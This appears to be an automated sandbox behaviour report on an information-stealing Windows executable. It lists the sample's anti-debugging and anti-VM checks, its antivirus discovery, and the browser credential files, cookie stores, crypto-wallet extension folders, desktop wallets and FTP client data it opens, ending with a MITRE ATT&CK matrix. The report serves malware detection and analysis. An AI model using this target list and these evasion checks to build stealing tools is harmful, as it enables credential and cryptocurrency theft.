          Source: file.exe, 00000003.00000002.1836358010.0000000000D9C000.00000040.00000001.01000000.00000004.sdmp, file.exe, 00000003.00000002.1852726936.00000000061E0000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
          Source: file.exe, 00000003.00000003.1455186310.0000000005503000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
          Source: file.exe, 00000003.00000003.1455186310.0000000005503000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
          Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          barindex
          Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
          Source: C:\Users\user\Desktop\file.exeFile opened: SICE
          Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061EBE0B rdtsc 3_2_061EBE0B
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061EBE71 LdrInitializeThunk,3_2_061EBE71
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
          Source: file.exe, file.exe, 00000003.00000002.1836358010.0000000000D9C000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: :Program Manager
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: file.exe, 00000003.00000003.1564288085.0000000000863000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1564270592.00000000054B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 8100, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: file.exe, 00000003.00000003.1482088148.0000000000856000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: allets","m":["*"],"z":"Wallets/ElectronCash"
          Source: file.exe, 00000003.00000003.1482021284.00000000054AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx Libertytgw
          Source: file.exe, 00000003.00000003.1743605390.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Exodus
          Source: file.exe, 00000003.00000003.1524310129.0000000000846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
          Source: file.exe, 00000003.00000003.1524310129.0000000000846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs.jsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\formhistory.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
          Source: Yara matchFile source: 00000003.00000003.1524310129.0000000000846000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 8100, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 8100, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Windows Management Instrumentation
          1
          Registry Run Keys / Startup Folder
          12
          Process Injection
          1
          Masquerading
          2
          OS Credential Dumping
          761
          Security Software Discovery
          Remote Services1
          Archive Collected Data
          11
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts2
          Command and Scripting Interpreter
          1
          DLL Side-Loading
          1
          Registry Run Keys / Startup Folder
          35
          Virtualization/Sandbox Evasion
          LSASS Memory35
          Virtualization/Sandbox Evasion
          Remote Desktop Protocol41
          Data from Local System
          11
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          DLL Side-Loading
          12
          Process Injection
          Security Account Manager2
          Process Discovery
          SMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
          Obfuscated Files or Information
          NTDS1
          File and Directory Discovery
          Distributed Component Object ModelInput Capture114
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
          Software Packing
          LSA Secrets223
          System Information Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading
